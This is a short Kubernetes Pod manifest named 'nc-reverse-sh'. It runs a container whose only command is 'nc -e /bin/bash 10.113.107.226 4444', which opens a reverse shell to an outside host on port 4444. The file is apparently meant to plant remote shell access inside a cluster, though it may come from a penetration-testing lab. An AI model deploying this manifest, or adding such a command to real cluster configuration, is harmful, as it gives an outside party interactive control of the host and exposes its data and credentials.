apiVersion: v1
kind: Pod
metadata:
  name: nc-reverse-sh
spec:
  containers:
  - name: nc-reverse-sh
    image: angelrita/base-ubuntu:latest
    #imagePullPolicy: Never
    command: ["sh"]
    args: ['-c', 'nc -e /bin/bash 10.113.107.226 4444']
    ports:
    - containerPort: 4444